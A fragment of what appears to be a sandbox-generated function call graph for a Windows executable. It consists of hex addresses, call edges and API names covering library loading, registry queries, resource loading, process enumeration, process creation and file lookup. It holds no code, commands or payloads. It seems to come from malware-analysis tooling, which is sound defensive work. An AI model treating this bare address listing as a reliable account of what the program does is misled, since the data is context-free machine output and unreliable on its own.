API calls 95761->95833 95834 b270b0 23 API calls 95761->95834 95835 b23084 22 API calls 95761->95835 95765 b24af0 __wsopen_s 95764->95765 95766 b26b57 22 API calls 95765->95766 95767 b24b22 95765->95767 95766->95767 95777 b24b58 95767->95777 95875 b24c6d 95767->95875 95769 b24c6d 22 API calls 95769->95777 95770 b29cb3 22 API calls 95772 b24c52 95770->95772 95771 b29cb3 22 API calls 95771->95777 95773 b2515f 22 API calls 95772->95773 95775 b24c5e 95773->95775 95775->95689 95776 b24c29 95776->95770 95776->95775 95777->95769 95777->95771 95777->95776 95878 b2515f 95777->95878 95884 b61f50 95778->95884 95781 b29cb3 22 API calls 95782 b23a8d 95781->95782 95886 b23aa2 95782->95886 95784 b23a97 95784->95691 95786 b29cc2 _wcslen 95785->95786 95787 b3fe0b 22 API calls 95786->95787 95788 b29cea __fread_nolock 95787->95788 95789 b3fddb 22 API calls 95788->95789 95790 b22e8c 95789->95790 95791 b24ecb 95790->95791 95906 b24e90 LoadLibraryA 95791->95906 95796 b24ef6 LoadLibraryExW 95914 b24e59 LoadLibraryA 95796->95914 95797 b63ccf 95799 b24f39 68 API calls 95797->95799 95800 b63cd6 95799->95800 95802 b24e59 3 API calls 95800->95802 95804 b63cde 95802->95804 95936 b250f5 40 API calls __fread_nolock 95804->95936 95805 b24f20 95805->95804 95806 b24f2c 95805->95806 95808 b24f39 68 API calls 95806->95808 95810 b22ea5 95808->95810 95809 b63cf5 95937 b928fe 27 API calls 95809->95937 95810->95696 95810->95697 95812 b63d05 95813->95702 95814->95706 95815->95712 95816->95721 95817->95730 95818->95733 95819->95737 95820->95743 95821->95746 95822->95751 95823->95755 95824->95747 95826 b263f3 95825->95826 95827 b3fddb 22 API calls 95826->95827 95828 b26401 95827->95828 96014 b26a26 22 API calls 95828->96014 95830 b22ff8 95831 b26a50 22 API calls 95830->95831 95831->95756 95832->95761 95833->95761 95834->95761 95835->95761 95837 b92d15 95836->95837 96015 b2511f 64 API calls 95837->96015 95839 b92d29 96016 b92e66 75 API calls 95839->96016 95841 b92d3b 95859 b92d3f 95841->95859 96017 b250f5 40 API calls __fread_nolock 95841->96017 95843 b92d56 96018 b250f5 40 API calls __fread_nolock 95843->96018 95845 b92d66 96019 b250f5 40 API calls __fread_nolock 95845->96019 95847 b92d81 96020 b250f5 40 API calls __fread_nolock 95847->96020 95849 b92d9c 96021 b2511f 64 API calls 95849->96021 95851 b92db3 95852 b4ea0c ___std_exception_copy 21 API calls 95851->95852 95853 b92dba 95852->95853 95854 b4ea0c ___std_exception_copy 21 API calls 95853->95854 95855 b92dc4 95854->95855 96022 b250f5 40 API calls __fread_nolock 95855->96022 95857 b92dd8 96023 b928fe 27 API calls 95857->96023 95859->95699 95860 b92dee 95860->95859 96024 b922ce 95860->96024 95863 b24f43 95862->95863 95867 b24f4a 95862->95867 95864 b4e678 67 API calls 95863->95864 95864->95867 95865 b24f6a FreeLibrary 95866 b24f59 95865->95866 95866->95701 95867->95865 95867->95866 95868->95713 95869->95718 95870->95723 95871->95727 95872->95731 95873->95738 95874->95742 95876 b2aec9 22 API calls 95875->95876 95877 b24c78 95876->95877 95877->95767 95879 b2516e 95878->95879 95883 b2518f __fread_nolock 95878->95883 95881 b3fe0b 22 API calls 95879->95881 95880 b3fddb 22 API calls 95882 b251a2 95880->95882 95881->95883 95882->95777 95883->95880 95885 b23a67 GetModuleFileNameW 95884->95885 95885->95781 95887 b61f50 __wsopen_s 95886->95887 95888 b23aaf GetFullPathNameW 95887->95888 95889 b23ae9 95888->95889 95890 b23ace 95888->95890 95900 b2a6c3 95889->95900 95891 b26b57 22 API calls 95890->95891 95893 b23ada 95891->95893 95896 b237a0 95893->95896 95897 b237ae 95896->95897 95898 b293b2 22 API calls 95897->95898 95899 b237c2 95898->95899 95899->95784 95901 b2a6d0 95900->95901 95902 b2a6dd 95900->95902 95901->95893 95903 b3fddb 22 API calls 95902->95903 95904 b2a6e7 95903->95904 95905 b3fe0b 22 API calls 95904->95905 95905->95901 95907 b24ec6 95906->95907 95908 b24ea8 GetProcAddress 95906->95908 95911 b4e5eb 95907->95911 95909 b24eb8 95908->95909 95909->95907 95910 b24ebf FreeLibrary 95909->95910 95910->95907 95938 b4e52a 95911->95938 95913 b24eea 95913->95796 95913->95797 95915 b24e6e GetProcAddress 95914->95915 95916 b24e8d 95914->95916 95917 b24e7e 95915->95917 95919 b24f80 95916->95919 95917->95916 95918 b24e86 FreeLibrary 95917->95918 95918->95916 95920 b3fe0b 22 API calls 95919->95920 95921 b24f95 95920->95921 96000 b25722 95921->96000 95923 b24fa1 __fread_nolock 95924 b250a5 95923->95924 95925 b63d1d 95923->95925 95930 b24fdc 95923->95930 96003 b242a2 CreateStreamOnHGlobal 95924->96003 96011 b9304d 74 API calls 95925->96011 95928 b63d22 96012 b2511f 64 API calls 95928->96012 95930->95928 95935 b2506e messages 95930->95935 96009 b250f5 40 API calls __fread_nolock 95930->96009 96010 b2511f 64 API calls 95930->96010 95932 b63d45 96013 b250f5 40 API calls __fread_nolock 95932->96013 95935->95805 95936->95809 95937->95812 95941 b4e536 ___DestructExceptionObject 95938->95941 95939 b4e544 95963 b4f2d9 20 API calls __dosmaperr 95939->95963 95941->95939 95943 b4e574 95941->95943 95942 b4e549 95964 b527ec 26 API calls __fread_nolock 95942->95964 95945 b4e586 95943->95945 95946 b4e579 95943->95946 95955 b58061 95945->95955 95965 b4f2d9 20 API calls __dosmaperr 95946->95965 95949 b4e58f 95950 b4e595 95949->95950 95951 b4e5a2 95949->95951 95966 b4f2d9 20 API calls __dosmaperr 95950->95966 95967 b4e5d4 LeaveCriticalSection __fread_nolock 95951->95967 95953 b4e554 __fread_nolock 95953->95913 95956 b5806d ___DestructExceptionObject 95955->95956 95968 b52f5e EnterCriticalSection 95956->95968 95958 b5807b 95969 b580fb 95958->95969 95962 b580ac __fread_nolock 95962->95949 95963->95942 95964->95953 95965->95953 95966->95953 95967->95953 95968->95958 95976 b5811e 95969->95976 95970 b58177 95987 b54c7d 95970->95987 95975 b58189 95981 b58088 95975->95981 95995 b53405 11 API calls 2 library calls 95975->95995 95976->95970 95976->95976 95976->95981 95985 b4918d EnterCriticalSection 95976->95985 95986 b491a1 LeaveCriticalSection 95976->95986 95978 b581a8 95996 b4918d EnterCriticalSection 95978->95996 95982 b580b7 95981->95982 95999 b52fa6 LeaveCriticalSection 95982->95999 95984 b580be 95984->95962 95985->95976 95986->95976 95988 b54c8a pre_c_initialization 95987->95988 95989 b54cca 95988->95989 95990 b54cb5 RtlAllocateHeap 95988->95990 95997 b44ead 7 API calls 2 library calls 95988->95997 95998 b4f2d9 20 API calls __dosmaperr 95989->95998 95990->95988 95992 b54cc8 95990->95992 95994 b529c8 20 API calls __dosmaperr 95992->95994 95994->95975 95995->95978 95996->95981 95997->95988 95998->95992 95999->95984 96001 b3fddb 22 API calls 96000->96001 96002 b25734 96001->96002 96002->95923 96004 b242d9 96003->96004 96005 b242bc FindResourceExW 96003->96005 96004->95930 96005->96004 96006 b635ba LoadResource 96005->96006 96006->96004 96007 b635cf SizeofResource 96006->96007 96007->96004 96008 b635e3 LockResource 96007->96008 96008->96004 96009->95930 96010->95930 96011->95928 96012->95932 96013->95935 96014->95830 96015->95839 96016->95841 96017->95843 96018->95845 96019->95847 96020->95849 96021->95851 96022->95857 96023->95860 96025 b922d9 96024->96025 96026 b922e7 96024->96026 96027 b4e5eb 29 API calls 96025->96027 96028 b9232c 96026->96028 96029 b4e5eb 29 API calls 96026->96029 96048 b922f0 96026->96048 96027->96026 96053 b92557 40 API calls __fread_nolock 96028->96053 96030 b92311 96029->96030 96030->96028 96032 b9231a 96030->96032 96032->96048 96061 b4e678 96032->96061 96033 b92370 96034 b92395 96033->96034 96035 b92374 96033->96035 96054 b92171 96034->96054 96038 b92381 96035->96038 96040 b4e678 67 API calls 96035->96040 96041 b4e678 67 API calls 96038->96041 96038->96048 96039 b9239d 96042 b923c3 96039->96042 96043 b923a3 96039->96043 96040->96038 96041->96048 96074 b923f3 74 API calls 96042->96074 96045 b923b0 96043->96045 96046 b4e678 67 API calls 96043->96046 96047 b4e678 67 API calls 96045->96047 96045->96048 96046->96045 96047->96048 96048->95859 96049 b923de 96049->96048 96052 b4e678 67 API calls 96049->96052 96050 b923ca 96050->96049 96051 b4e678 67 API calls 96050->96051 96051->96049 96052->96048 96053->96033 96055 b4ea0c ___std_exception_copy 21 API calls 96054->96055 96056 b9217f 96055->96056 96057 b4ea0c ___std_exception_copy 21 API calls 96056->96057 96058 b92190 96057->96058 96059 b4ea0c ___std_exception_copy 21 API calls 96058->96059 96060 b9219c 96059->96060 96060->96039 96062 b4e684 ___DestructExceptionObject 96061->96062 96063 b4e695 96062->96063 96064 b4e6aa 96062->96064 96092 b4f2d9 20 API calls __dosmaperr 96063->96092 96073 b4e6a5 __fread_nolock 96064->96073 96075 b4918d EnterCriticalSection 96064->96075 96067 b4e69a 96093 b527ec 26 API calls __fread_nolock 96067->96093 96068 b4e6c6 96076 b4e602 96068->96076 96071 b4e6d1 96094 b4e6ee LeaveCriticalSection __fread_nolock 96071->96094 96073->96048 96074->96050 96075->96068 96077 b4e624 96076->96077 96078 b4e60f 96076->96078 96084 b4e61f 96077->96084 96095 b4dc0b 96077->96095 96127 b4f2d9 20 API calls __dosmaperr 96078->96127 96081 b4e614 96128 b527ec 26 API calls __fread_nolock 96081->96128 96084->96071 96088 b4e646 96112 b5862f 96088->96112 96092->96067 96093->96073 96094->96073 96096 b4dc23 96095->96096 96098 b4dc1f 96095->96098 96097 b4d955 __fread_nolock 26 API calls 96096->96097 96096->96098 96099 b4dc43 96097->96099 96101 b54d7a 96098->96101 96130 b559be 62 API calls 4 library calls 96099->96130 96102 b4e640 96101->96102 96103 b54d90 96101->96103 96105 b4d955 96102->96105 96103->96102 96131 b529c8 20 API calls __dosmaperr 96103->96131 96106 b4d976 96105->96106 96107 b4d961 96105->96107 96106->96088 96132 b4f2d9 20 API calls __dosmaperr 96107->96132 96109 b4d966 96133 b527ec 26 API calls __fread_nolock 96109->96133 96111 b4d971 96111->96088 96113 b58653 96112->96113 96114 b5863e 96112->96114 96116 b5868e 96113->96116 96119 b5867a 96113->96119 96137 b4f2c6 20 API calls __dosmaperr 96114->96137 96139 b4f2c6 20 API calls __dosmaperr 96116->96139 96118 b58643 96138 b4f2d9 20 API calls __dosmaperr 96118->96138 96134 b58607 96119->96134 96120 b58693 96140 b4f2d9 20 API calls __dosmaperr 96120->96140 96124 b4e64c 96124->96084 96129 b529c8 20 API calls __dosmaperr 96124->96129 96125 b5869b 96141 b527ec 26 API calls __fread_nolock 96125->96141 96127->96081 96128->96084 96129->96084 96130->96098 96131->96102 96132->96109 96133->96111 96142 b58585 96134->96142 96136 b5862b 96136->96124 96137->96118 96138->96124 96139->96120 96140->96125 96141->96124 96143 b58591 ___DestructExceptionObject 96142->96143 96153 b55147 EnterCriticalSection 96143->96153 96145 b5859f 96146 b585c6 96145->96146 96147 b585d1 96145->96147 96154 b586ae 96146->96154 96169 b4f2d9 20 API calls __dosmaperr 96147->96169 96150 b585cc 96170 b585fb LeaveCriticalSection __wsopen_s 96150->96170 96152 b585ee __fread_nolock 96152->96136 96153->96145 96171 b553c4 96154->96171 96156 b586c4 96184 b55333 21 API calls 2 library calls 96156->96184 96158 b586be 96158->96156 96161 b553c4 __wsopen_s 26 API calls 96158->96161 96168 b586f6 96158->96168 96159 b553c4 __wsopen_s 26 API calls 96162 b58702 CloseHandle 96159->96162 96160 b5871c 96166 b5873e 96160->96166 96185 b4f2a3 20 API calls __dosmaperr 96160->96185 96163 b586ed 96161->96163 96162->96156 96164 b5870e GetLastError 96162->96164 96167 b553c4 __wsopen_s 26 API calls 96163->96167 96164->96156 96166->96150 96167->96168 96168->96156 96168->96159 96169->96150 96170->96152 96172 b553e6 96171->96172 96173 b553d1 96171->96173 96178 b5540b 96172->96178 96188 b4f2c6 20 API calls __dosmaperr 96172->96188 96186 b4f2c6 20 API calls __dosmaperr 96173->96186 96175 b553d6 96187 b4f2d9 20 API calls __dosmaperr 96175->96187 96178->96158 96179 b55416 96189 b4f2d9 20 API calls __dosmaperr 96179->96189 96180 b553de 96180->96158 96182 b5541e 96190 b527ec 26 API calls __fread_nolock 96182->96190 96184->96160 96185->96166 96186->96175 96187->96180 96188->96179 96189->96182 96190->96180 96191 b2105b 96196 b2344d 96191->96196 96193 b2106a 96227 b400a3 29 API calls __onexit 96193->96227 96195 b21074 96197 b2345d __wsopen_s 96196->96197 96198 b2a961 22 API calls 96197->96198 96199 b23513 96198->96199 96200 b23a5a 24 API calls 96199->96200 96201 b2351c 96200->96201 96228 b23357 96201->96228 96204 b233c6 22 API calls 96205 b23535 96204->96205 96206 b2515f 22 API calls 96205->96206 96207 b23544 96206->96207 96208 b2a961 22 API calls 96207->96208 96209 b2354d 96208->96209 96210 b2a6c3 22 API calls 96209->96210 96211 b23556 RegOpenKeyExW 96210->96211 96212 b63176 RegQueryValueExW 96211->96212 96216 b23578 96211->96216 96213 b63193 96212->96213 96214 b6320c RegCloseKey 96212->96214 96215 b3fe0b 22 API calls 96213->96215 96214->96216 96226 b6321e _wcslen 96214->96226 96217 b631ac 96215->96217 96216->96193 96219 b25722 22 API calls 96217->96219 96218 b24c6d 22 API calls 96218->96226 96220 b631b7 RegQueryValueExW 96219->96220 96221 b631d4 96220->96221 96223 b631ee messages 96220->96223 96222 b26b57 22 API calls 96221->96222 96222->96223 96223->96214 96224 b29cb3 22 API calls 96224->96226 96225 b2515f 22 API calls 96225->96226 96226->96216 96226->96218 96226->96224 96226->96225 96227->96195 96229 b61f50 __wsopen_s 96228->96229 96230 b23364 GetFullPathNameW 96229->96230 96231 b23386 96230->96231 96232 b26b57 22 API calls 96231->96232 96233 b233a4 96232->96233 96233->96204 96234 b21098 96239 b242de 96234->96239 96238 b210a7 96240 b2a961 22 API calls 96239->96240 96241 b242f5 GetVersionExW 96240->96241 96242 b26b57 22 API calls 96241->96242 96243 b24342 96242->96243 96244 b293b2 22 API calls 96243->96244 96256 b24378 96243->96256 96245 b2436c 96244->96245 96247 b237a0 22 API calls 96245->96247 96246 b2441b GetCurrentProcess IsWow64Process 96248 b24437 96246->96248 96247->96256 96249 b63824 GetSystemInfo 96248->96249 96250 b2444f LoadLibraryA 96248->96250 96251 b24460 GetProcAddress 96250->96251 96252 b2449c GetSystemInfo 96250->96252 96251->96252 96254 b24470 GetNativeSystemInfo 96251->96254 96255 b24476 96252->96255 96253 b637df 96254->96255 96257 b2109d 96255->96257 96258 b2447a FreeLibrary 96255->96258 96256->96246 96256->96253 96259 b400a3 29 API calls __onexit 96257->96259 96258->96257 96259->96238 96260 b2f7bf 96261 b2f7d3 96260->96261 96262 b2fcb6 96260->96262 96264 b2fcc2 96261->96264 96266 b3fddb 22 API calls 96261->96266 96263 b2aceb 23 API calls 96262->96263 96263->96264 96265 b2aceb 23 API calls 96264->96265 96269 b2fd3d 96265->96269 96267 b2f7e5 96266->96267 96267->96264 96268 b2f83e 96267->96268 96267->96269 96277 b2ed9d messages 96268->96277 96295 b31310 96268->96295 96355 b91155 22 API calls 96269->96355 96272 b74beb 96361 b9359c 82 API calls __wsopen_s 96272->96361 96275 b74b0b 96359 b9359c 82 API calls __wsopen_s 96275->96359 96276 b2a8c7 22 API calls 96294 b2ec76 messages 96276->96294 96278 b2f3ae messages 96278->96277 96358 b9359c 82 API calls __wsopen_s 96278->96358 96279 b2fef7 96279->96277 96357 b2a8c7 22 API calls __fread_nolock 96279->96357 96280 b74600 96280->96277 96356 b2a8c7 22 API calls __fread_nolock 96280->96356 96285 b40242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96285->96294 96287 b2fbe3 96287->96277 96287->96278 96289 b74bdc 96287->96289 96288 b2a961 22 API calls 96288->96294 96360 b9359c 82 API calls __wsopen_s 96289->96360 96291 b400a3 29 API calls pre_c_initialization 96291->96294 96292 b401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96292->96294 96293 b3fddb 22 API calls 96293->96294 96294->96272 96294->96275 96294->96276 96294->96277 96294->96278 96294->96279 96294->96280 96294->96285 96294->96287 96294->96288 96294->96291 96294->96292 96294->96293 96353 b301e0 349 API calls 2 library calls 96294->96353 96354 b306a0 41 API calls messages 96294->96354 96296 b317b0 96295->96296 96297 b31376 96295->96297 96420 b40242 5 API calls __Init_thread_wait 96296->96420 96299 b31390 96297->96299 96300 b76331 96297->96300 96362 b31940 96299->96362 96301 b7633d 96300->96301 96424 ba709c 349 API calls 96300->96424 96301->96294 96303 b317ba 96305 b317fb 96303->96305 96308 b29cb3 22 API calls 96303->96308 96310 b76346 96305->96310 96312 b3182c 96305->96312 96307 b31940 9 API calls 96309 b313b6 96307->96309 96316 b317d4 96308->96316 96309->96305 96311 b313ec 96309->96311 96425 b9359c 82 API calls __wsopen_s 96310->96425 96311->96310 96335 b31408 __fread_nolock 96311->96335 96313 b2aceb 23 API calls 96312->96313 96315 b31839 96313->96315 96422 b3d217 349 API calls 96315->96422 96421 b401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96316->96421 96319 b7636e 96426 b9359c 82 API calls __wsopen_s 96319->96426 96320 b3152f 96322 b763d1 96320->96322 96323 b3153c 96320->96323 96428 ba5745 54 API calls _wcslen 96322->96428 96325 b31940 9 API calls 96323->96325 96326 b31549 96325->96326 96329 b764fa 96326->96329 96331 b31940 9 API calls 96326->96331 96327 b3fddb 22 API calls 96327->96335 96328 b3fe0b 22 API calls 96328->96335 96339 b76369 96329->96339 96430 b9359c 82 API calls __wsopen_s 96329->96430 96330 b31872 96423 b3faeb 23 API calls 96330->96423 96337 b31563 96331->96337 96334 b2ec40 349 API calls 96334->96335 96335->96315 96335->96319 96335->96320 96335->96327 96335->96328 96335->96334 96336 b763b2 96335->96336 96335->96339 96427 b9359c 82 API calls __wsopen_s 96336->96427 96337->96329 96342 b315c7 messages 96337->96342 96429 b2a8c7 22 API calls __fread_nolock 96337->96429 96339->96294 96341 b31940 9 API calls 96341->96342 96342->96329 96342->96330 96342->96339 96342->96341 96345 b3167b messages 96342->96345 96372 b3f645 96342->96372 96379 baabf7 96342->96379 96384 bb19bc 96342->96384 96387 baa67c CreateToolhelp32Snapshot Process32FirstW 96342->96387 96407 baab67 96342->96407 96410 bb29bf 96342->96410 96414 b95c5a 96342->96414 96343 b3171d 96343->96294 96345->96343 96419 b3ce17 22 API calls messages 96345->96419 96353->96294 96354->96294 96355->96277 96356->96277 96357->96277 96358->96277 96359->96277 96360->96272 96361->96277 96363 b31981 96362->96363 96367 b3195d 96362->96367 96431 b40242 5 API calls __Init_thread_wait 96363->96431 96366 b3198b 96366->96367 96432 b401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96366->96432 96371 b313a0 96367->96371 96433 b40242 5 API calls __Init_thread_wait 96367->96433 96368 b38727 96368->96371 96434 b401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96368->96434 96371->96307 96435 b2b567 96372->96435 96374 b3f659 96375 b3f661 timeGetTime 96374->96375 96376 b7f2dc Sleep 96374->96376 96377 b2b567 39 API calls 96375->96377 96378 b3f677 96377->96378 96378->96342 96441 baaff9 96379->96441 96381 baac54 96381->96342 96382 baac0c 96382->96381 96383 b2aceb 23 API calls 96382->96383 96383->96381 96590 bb2ad8 96384->96590 96386 bb19cb 96386->96342 96395 baa6c3 96387->96395 96388 b2a961 22 API calls 96388->96395 96389 b29cb3 22 API calls 96389->96395 96391 b26350 22 API calls 96391->96395 96392 b27510 53 API calls 96392->96395 96395->96388 96395->96389 96395->96391 96395->96392 96396 baa796 Process32NextW 96395->96396 96601 b2525f 96395->96601 96643 b3ce60 41 API calls 96395->96643 96644 bab574 22 API calls __fread_nolock 96395->96644 96396->96395 96397 baa7aa CloseHandle 96396->96397 96398 b263eb 22 API calls 96397->96398 96399 baa7b9 96398->96399 96645 b26a50 22 API calls 96399->96645 96401 baa7cd 96646 b304f0 22 API calls 96401->96646 96403 baa87d 96403->96342 96405 baa7d9 96405->96403 96406 b304f0 22 API calls 96405->96406 96647 b262b5 22 API calls 96405->96647 96406->96405 96408 baaff9 217 API calls 96407->96408 96409 baab79 96408->96409 96409->96342 96411 bb29cb 96410->96411 96412 bb2a01 GetForegroundWindow 96411->96412 96413 bb29d1 96411->96413 96412->96413 96413->96342 96415 b27510 53 API calls 96414->96415 96416 b95c6d 96415->96416 96668 b8dbbe lstrlenW 96416->96668 96418 b95c77 96418->96342 96419->96345 96420->96303 96421->96305 96422->96330 96423->96330 96424->96301 96425->96339 96426->96339 96427->96339 96428->96337 96429->96342 96430->96339 96431->96366 96432->96367 96433->96368 96434->96371 96436 b2b578 96435->96436 96437 b2b57f 96435->96437 96436->96437 96440 b462d1 39 API calls 96436->96440 96437->96374 96439 b2b5c2 96439->96374 96440->96439 96442 bab01d ___scrt_fastfail 96441->96442 96443 bab058 96442->96443 96444 bab094 96442->96444 96445 b2b567 39 API calls 96443->96445 96446 b2b567 39 API calls 96444->96446 96451 bab08b 96444->96451 96447 bab063 96445->96447 96450 bab0a5 96446->96450 96447->96451 96454 b2b567 39 API calls 96447->96454 96448 bab0ed 96532 b27510 96448->96532 96453 b2b567 39 API calls 96450->96453 96451->96448 96455 b2b567 39 API calls 96451->96455 96453->96451 96457 bab078 96454->96457 96455->96448 96459 b2b567 39 API calls 96457->96459 96458 bab115 96460 bab1d8 96458->96460 96461 bab11f 96458->96461 96459->96451 96463 bab20a GetCurrentDirectoryW 96460->96463 96466 b27510 53 API calls 96460->96466 96462 b27510 53 API calls 96461->96462 96464 bab130 96462->96464 96465 b3fe0b 22 API calls 96463->96465 96467 b27620 22 API calls 96464->96467 96468 bab22f GetCurrentDirectoryW 96465->96468 96469 bab1ef 96466->96469 96471 bab13a 96467->96471 96472 bab23c 96468->96472 96470 b27620 22 API calls 96469->96470 96473 bab1f9 _wcslen 96470->96473 96474 b27510 53 API calls 96471->96474 96476 bab275 96472->96476 96562 b29c6e 22 API calls 96472->96562 96473->96463 96473->96476 96475 bab14b 96474->96475 96477 b27620 22 API calls 96475->96477 96481 bab28b 96476->96481 96482 bab287 96476->96482 96479 bab155 96477->96479 96483 b27510 53 API calls 96479->96483 96480 bab255 96563 b29c6e 22 API calls 96480->96563 96565 b907c0 10 API calls 96481->96565 96489 bab39a CreateProcessW 96482->96489 96490 bab2f8 96482->96490 96486 bab166 96483->96486 96491 b27620 22 API calls 96486->96491 96487 bab265 96564 b29c6e 22 API calls 96487->96564 96488 bab294 96566 b906e6 10 API calls 96488->96566 96511 bab32f _wcslen 96489->96511 96568 b811c8 39 API calls 96490->96568 96493 bab170 96491->96493 96496 bab1a6 GetSystemDirectoryW 96493->96496 96501 b27510 53 API calls 96493->96501 96503 b3fe0b 22 API calls 96496->96503 96497 bab2aa 96567 b905a7 8 API calls 96497->96567 96498 bab2fd 96499 bab32a 96498->96499 96500 bab323 96498->96500 96570 b814ce 6 API calls 96499->96570 96569 b81201 128 API calls 2 library calls 96500->96569 96505 bab187 96501->96505 96508 bab1cb GetSystemDirectoryW 96503->96508 96510 b27620 22 API calls 96505->96510 96507 bab2d0 96507->96482 96508->96472 96509 bab328 96509->96511 96512 bab191 _wcslen 96510->96512 96513 bab42f CloseHandle 96511->96513 96514 bab3d6 GetLastError 96511->96514 96512->96472 96512->96496 96515 bab43f 96513->96515 96531 bab49a 96513->96531 96524 bab41a 96514->96524 96517 bab451 96515->96517 96518 bab446 CloseHandle 96515->96518 96520 bab458 CloseHandle 96517->96520 96521 bab463 96517->96521 96518->96517 96519 bab4a6 96519->96524 96520->96521 96522 bab46a CloseHandle 96521->96522 96523 bab475 96521->96523 96522->96523 96571 b909d9 34 API calls 96523->96571 96559 b90175 96524->96559 96527 bab486 96572 bab536 25 API calls 96527->96572 96528 bab4d2 CloseHandle 96528->96524 96531->96519 96531->96528 96533 b27522 96532->96533 96534 b27525 96532->96534 96555 b27620 96533->96555 96535 b2755b 96534->96535 96536 b2752d 96534->96536 96537 b650f6 96535->96537 96540 b2756d 96535->96540 96547 b6500f 96535->96547 96573 b451c6 26 API calls 96536->96573 96576 b45183 26 API calls 96537->96576 96574 b3fb21 51 API calls 96540->96574 96541 b2753d 96544 b3fddb 22 API calls 96541->96544 96542 b6510e 96542->96542 96546 b27547 96544->96546 96548 b29cb3 22 API calls 96546->96548 96549 b3fe0b 22 API calls 96547->96549 96554 b65088 96547->96554 96548->96533 96550 b65058 96549->96550 96551 b3fddb 22 API calls 96550->96551 96552 b6507f 96551->96552 96553 b29cb3 22 API calls 96552->96553 96553->96554 96575 b3fb21 51 API calls 96554->96575 96556 b2762a _wcslen 96555->96556 96557 b3fe0b 22 API calls 96556->96557 96558 b2763f 96557->96558 96558->96458 96577 b9030f 96559->96577 96562->96480 96563->96487 96564->96476 96565->96488 96566->96497 96567->96507 96568->96498 96569->96509 96570->96511 96571->96527 96572->96531 96573->96541 96574->96541 96575->96537 96576->96542 96578 b90329 96577->96578 96579 b90321 CloseHandle 96577->96579 96580 b9032e CloseHandle 96578->96580 96581 b90336 96578->96581 96579->96578 96580->96581 96582 b9033b CloseHandle 96581->96582 96583 b90343 96581->96583 96582->96583 96584 b90348 CloseHandle 96583->96584 96585 b90350 96583->96585 96584->96585 96586 b9035d 96585->96586 96587 b90355 CloseHandle 96585->96587 96588 b9017d 96586->96588 96589 b90362 CloseHandle 96586->96589 96587->96586 96588->96382 96589->96588 96591 b2aceb 23 API calls 96590->96591 96592 bb2af3 96591->96592 96593 bb2aff 96592->96593 96594 bb2b1d 96592->96594 96595 b27510 53 API calls 96593->96595 96596 b26b57 22 API calls 96594->96596 96597 bb2b0c 96595->96597 96598 bb2b1b 96596->96598 96597->96598 96600 b2a8c7 22 API calls __fread_nolock 96597->96600 96598->96386 96600->96598 96602 b2a961 22 API calls 96601->96602 96603 b25275 96602->96603 96604 b2a961 22 API calls 96603->96604 96605 b2527d 96604->96605 96606 b2a961 22 API calls 96605->96606 96607 b25285 96606->96607 96608 b2a961 22 API calls 96607->96608 96609 b2528d 96608->96609 96610 b63df5 96609->96610 96611 b252c1 96609->96611 96663 b2a8c7 22 API calls __fread_nolock 96610->96663 96613 b26d25 22 API calls 96611->96613 96615 b252cf 96613->96615 96614 b63dfe 96616 b2a6c3 22 API calls 96614->96616 96617 b293b2 22 API calls 96615->96617 96621 b25304 96616->96621 96618 b252d9 96617->96618 96619 b26d25 22 API calls 96618->96619 96618->96621 96624 b252fa 96619->96624 96620 b25349 96648 b26d25 96620->96648 96621->96620 96622 b25325 96621->96622 96639 b63e20 96621->96639 96622->96620 96628 b24c6d 22 API calls 96622->96628 96626 b293b2 22 API calls 96624->96626 96625 b2535a 96627 b25370 96625->96627 96661 b2a8c7 22 API calls __fread_nolock 96625->96661 96626->96621 96629 b25384 96627->96629 96662 b2a8c7 22 API calls __fread_nolock 96627->96662 96630 b25332 96628->96630 96633 b2538f 96629->96633 96665 b2a8c7 22 API calls __fread_nolock 96629->96665 96630->96620 96635 b26d25 22 API calls 96630->96635 96631 b26b57 22 API calls 96640 b63ee0 96631->96640 96641 b2539a 96633->96641 96666 b2a8c7 22 API calls __fread_nolock 96633->96666 96635->96620 96638 b24c6d 22 API calls 96638->96640 96639->96631 96640->96620 96640->96638 96664 b249bd 22 API calls __fread_nolock 96640->96664 96641->96395 96643->96395 96644->96395 96645->96401 96646->96405 96647->96405 96649 b26d91 96648->96649 96650 b26d34 96648->96650 96652 b293b2 22 API calls 96649->96652 96650->96649 96651 b26d3f 96650->96651 96653 b26d5a 96651->96653 96654 b64c9d 96651->96654 96658 b26d62 __fread_nolock 96652->96658 96667 b26f34 22 API calls 96653->96667 96655 b3fddb 22 API calls 96654->96655 96657 b64ca7 96655->96657 96659 b3fe0b 22 API calls 96657->96659 96658->96625 96660 b64cda 96659->96660 96661->96627 96662->96629 96663->96614 96664->96640 96665->96633 96666->96641 96667->96658 96669 b8dbdc GetFileAttributesW 96668->96669 96670 b8dc06 96668->96670 96669->96670 96671 b8dbe8 FindFirstFileW 96669->96671 96670->96418 96671->96670 96672 b8dbf9 FindClose 96671->96672 96672->96670 96673 b2dddc 96676 b2b710 96673->96676 96677 b2b72b 96676->96677 96678 b70146 96677->96678 96679 b700f8 96677->96679 96706 b2b750 96677->96706 96718 ba58a2 349 API calls 2 library calls 96678->96718 96682 b70102 96679->96682 96685 b7010f 96679->96685 96679->96706 96716 ba5d33 349 API calls 96682->96716 96697 b2ba20 96685->96697 96717 ba61d0 349 API calls 2 library calls 96685->96717 96689 b703d9 96689->96689 96692 b2ba4e 96693 b70322 96721 ba5c0c 82 API calls 96693->96721 96697->96692 96722 b9359c 82 API calls __wsopen_s 96697->96722 96700 b2aceb 23 API calls 96700->96706 96701 b2bbe0 40 API calls 96701->96706 96702 b2ec40 349 API calls 96702->96706 96703 b3d336 40 API calls 96703->96706 96706->96692 96706->96693 96706->96697 96706->96700 96706->96701 96706->96702 96706->96703 96707 b2a81b 41 API calls 96706->96707 96708 b3d2f0 40 API calls 96706->96708 96709 b3a01b 349 API calls 96706->96709 96710 b40242 5 API calls __Init_thread_wait 96706->96710 96711 b3edcd 22 API calls 96706->96711 96712 b400a3 29 API calls __onexit 96706->96712 96713 b401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96706->96713 96714 b3ee53 82 API calls 96706->96714 96715 b3e5ca 349 API calls 96706->96715 96719 b7f6bf 23 API calls 96706->96719 96720 b2a8c7 22 API calls __fread_nolock 96706->96720 96707->96706 96708->96706 96709->96706 96710->96706 96711->96706 96712->96706 96713->96706 96714->96706 96715->96706 96716->96685 